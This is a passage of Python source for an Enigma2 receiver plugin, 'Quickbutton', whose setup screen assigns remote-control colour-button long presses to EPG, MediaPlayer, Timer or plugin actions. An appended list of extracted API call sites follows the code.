self["setupActions"] = ActionMap(["SetupActions", "ColorActions"],
{
"green": self.keySave,
"cancel": self.keyClose,
"ok": self.keySave,
"left": self.keyLeft,
"right": self.keyRight,
}, -2)
ConfigListScreen.__init__(self, [], session=session)
self.hbbtvinstalled = getHBBTVInstalled()
self.overwriteHBBTVButton = config.plugins.Quickbutton.overwritehbbtvredbutton
self.createSetup("config")
def createSetup(self, widget):
cfglist = []
red_b_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.red_b.value)
red_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.red.value)
green_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.green.value)
yellow_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.yellow.value)
blue_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.blue.value)
# feste Vorgaben...koennte man noch erweitern, da hole ich mir sinnvolle Vorschlaege aus Foren noch ein...
self.entryguilist.append(("0", _("Nothing")))
self.entryguilist.append(("1", _("Single EPG")))
self.entryguilist.append(("2", _("Multi EPG")))
self.entryguilist.append(("3", _("MediaPlayer")))
self.entryguilist.append(("4", _("Plugin browser")))
self.entryguilist.append(("5", _("switch 4:3 content display")))
self.entryguilist.append(("6", _("Timer")))
if self.hbbtvinstalled:
self.entryguilist.append(("7", _("HbbTV Applications")))
index = 8
else:
index = 7
# Vorgaben aus EXTENSIONSMENU, PLUGINMENU
for p in plugins.getPlugins(where=[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]):
self.entryguilist.append((str(index), str(p.name)))
if config.plugins.Quickbutton.red.value == str(p.name):
red_selectedindex = str(index)
if config.plugins.Quickbutton.red_b.value == str(p.name):
red_b_selectedindex = str(index)
if config.plugins.Quickbutton.green.value == str(p.name):
green_selectedindex = str(index)
if config.plugins.Quickbutton.yellow.value == str(p.name):
yellow_selectedindex = str(index)
if config.plugins.Quickbutton.blue.value == str(p.name):
blue_selectedindex = str(index)
index = index + 1
self.overwriteHBBTVButtonEntry = None
if self.hbbtvinstalled and ENABLE_RED_BUTTON:
self.overwriteHBBTVButtonEntry = getConfigListEntry(_("Overwrite HBBTV-red-button"), self.overwriteHBBTVButton)
cfglist.append(self.overwriteHBBTVButtonEntry)
self.redchoice = ConfigSelection(default=red_selectedindex, choices=self.entryguilist)
self.greenchoice = ConfigSelection(default=green_selectedindex, choices=self.entryguilist)
self.yellowchoice = ConfigSelection(default=yellow_selectedindex, choices=self.entryguilist)
self.bluechoice = ConfigSelection(default=blue_selectedindex, choices=self.entryguilist)
cfglist.append(getConfigListEntry(_("assigned to long red"), self.redchoice))
cfglist.append(getConfigListEntry(_("assigned to long green"), self.greenchoice))
cfglist.append(getConfigListEntry(_("assigned to long yellow"), self.yellowchoice))
cfglist.append(getConfigListEntry(_("assigned to long blue"), self.bluechoice))
if ENABLE_RED_BUTTON and (self.overwriteHBBTVButton.value or not self.hbbtvinstalled):
self.red_b_choice = ConfigSelection(default=red_b_selectedindex, choices=self.entryguilist)
cfglist.append(getConfigListEntry(_("assigned to red"), self.red_b_choice))
self[widget].list = cfglist
self[widget].l.setList(cfglist)
def getStaticPluginName(self, value):
if value == _("Single EPG"):
return "1"
elif value == _("Multi EPG"):
return "2"
elif value == _("MediaPlayer"):
return "3"
elif value == _("Plugin browser"):
return "4"
elif value == _("switch 4:3 content display"):
return "5"
elif value == _("Timer"):
return "6"
elif value == _("HbbTV Applications"):
return "7"
else:
return "0"
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.newConfig()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.newConfig()
def newConfig(self):
cur = self["config"].getCurrent()
if cur and (cur == self.overwriteHBBTVButtonEntry):
self.createSetup("config")
def keySave(self):
config.plugins.Quickbutton.red.value = self.entryguilist[int(self.redchoice.value)][1]
config.plugins.Quickbutton.green.value = self.entryguilist[int(self.greenchoice.value)][1]
config.plugins.Quickbutton.yellow.value = self.entryguilist[int(self.yellowchoice.value)][1]
config.plugins.Quickbutton.blue.value = self.entryguilist[int(self.bluechoice.value)][1]
if ENABLE_RED_BUTTON and (self.overwriteHBBTVButton.value or not self.hbbtvinstalled):
config.plugins.Quickbutton.red_b.value = self.entryguilist[int(self.red_b_choice.value)][1]
self.overwriteHBBTVButton.save()
config.plugins.Quickbutton.save()
configfile.save()
self.close()
def keyClose(self):
self.close()
|
[
"Components.config.ConfigSubsection",
"Components.config.config.plugins.Quickbutton.save",
"Components.ConfigList.ConfigListScreen.keyLeft",
"Screens.Screen.Screen.__init__",
"Plugins.Plugin.PluginDescriptor",
"Components.PluginComponent.plugins.getPlugins",
"Components.ActionMap.HelpableActionMap",
"Components.ConfigList.ConfigListScreen.keyRight",
"Components.config.ConfigYesNo",
"Components.config.ConfigSelection",
"Components.config.config.av.policy_43.save",
"Components.ActionMap.ActionMap",
"Components.ConfigList.ConfigListScreen.__init__",
"Components.config.configfile.save"
] |
[((1253, 1271), 'Components.config.ConfigSubsection', 'ConfigSubsection', ([], {}), '()\n', (1269, 1271), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((1325, 1351), 'Components.config.ConfigYesNo', 'ConfigYesNo', ([], {'default': '(False)'}), '(default=False)\n', (1336, 1351), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((2782, 2856), 'Plugins.Plugin.PluginDescriptor', 'PluginDescriptor', ([], {'where': 'PluginDescriptor.WHERE_SESSIONSTART', 'fnc': 'autostart'}), '(where=PluginDescriptor.WHERE_SESSIONSTART, fnc=autostart)\n', (2798, 2856), False, 'from Plugins.Plugin import PluginDescriptor\n'), ((3767, 3815), 'Components.ActionMap.HelpableActionMap', 'HelpableActionMap', (['self', '"""QuickbuttonActions"""', 'x'], {}), "(self, 'QuickbuttonActions', x)\n", (3784, 3815), False, 'from Components.ActionMap import ActionMap, HelpableActionMap\n'), ((7747, 7777), 'Screens.Screen.Screen.__init__', 'Screen.__init__', (['self', 'session'], {}), '(self, session)\n', (7762, 7777), False, 'from Screens.Screen import Screen\n'), ((7906, 8077), 'Components.ActionMap.ActionMap', 'ActionMap', (["['SetupActions', 'ColorActions']", "{'green': self.keySave, 'cancel': self.keyClose, 'ok': self.keySave, 'left':\n self.keyLeft, 'right': self.keyRight}", '(-2)'], {}), "(['SetupActions', 'ColorActions'], {'green': self.keySave,\n 'cancel': self.keyClose, 'ok': self.keySave, 'left': self.keyLeft,\n 'right': self.keyRight}, -2)\n", (7915, 8077), False, 'from Components.ActionMap import ActionMap, HelpableActionMap\n'), ((8094, 8146), 'Components.ConfigList.ConfigListScreen.__init__', 'ConfigListScreen.__init__', (['self', '[]'], {'session': 'session'}), '(self, [], session=session)\n', (8119, 8146), False, 'from Components.ConfigList import ConfigList, ConfigListScreen\n'), ((9443, 9547), 'Components.PluginComponent.plugins.getPlugins', 'plugins.getPlugins', ([], {'where': '[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]'}), '(where=[PluginDescriptor.WHERE_EXTENSIONSMENU,\n PluginDescriptor.WHERE_PLUGINMENU])\n', (9461, 9547), False, 'from Components.PluginComponent import plugins\n'), ((10379, 10448), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'red_selectedindex', 'choices': 'self.entryguilist'}), '(default=red_selectedindex, choices=self.entryguilist)\n', (10394, 10448), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((10470, 10541), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'green_selectedindex', 'choices': 'self.entryguilist'}), '(default=green_selectedindex, choices=self.entryguilist)\n', (10485, 10541), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((10564, 10636), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'yellow_selectedindex', 'choices': 'self.entryguilist'}), '(default=yellow_selectedindex, choices=self.entryguilist)\n', (10579, 10636), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((10657, 10727), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'blue_selectedindex', 'choices': 'self.entryguilist'}), '(default=blue_selectedindex, choices=self.entryguilist)\n', (10672, 10727), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((11822, 11852), 'Components.ConfigList.ConfigListScreen.keyLeft', 'ConfigListScreen.keyLeft', (['self'], {}), '(self)\n', (11846, 11852), False, 'from Components.ConfigList import ConfigList, ConfigListScreen\n'), ((11896, 11927), 'Components.ConfigList.ConfigListScreen.keyRight', 'ConfigListScreen.keyRight', (['self'], {}), '(self)\n', (11921, 11927), False, 'from Components.ConfigList import ConfigList, ConfigListScreen\n'), ((12700, 12733), 'Components.config.config.plugins.Quickbutton.save', 'config.plugins.Quickbutton.save', ([], {}), '()\n', (12731, 12733), False, 'from Components.config import config\n'), ((12736, 12753), 'Components.config.configfile.save', 'configfile.save', ([], {}), '()\n', (12751, 12753), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((11172, 11243), 'Components.config.ConfigSelection', 'ConfigSelection', ([], {'default': 'red_b_selectedindex', 'choices': 'self.entryguilist'}), '(default=red_b_selectedindex, choices=self.entryguilist)\n', (11187, 11243), False, 'from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo\n'), ((5678, 5704), 'Components.config.config.av.policy_43.save', 'config.av.policy_43.save', ([], {}), '()\n', (5702, 5704), False, 'from Components.config import config\n'), ((6368, 6472), 'Components.PluginComponent.plugins.getPlugins', 'plugins.getPlugins', ([], {'where': '[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]'}), '(where=[PluginDescriptor.WHERE_EXTENSIONSMENU,\n PluginDescriptor.WHERE_PLUGINMENU])\n', (6386, 6472), False, 'from Components.PluginComponent import plugins\n')]
|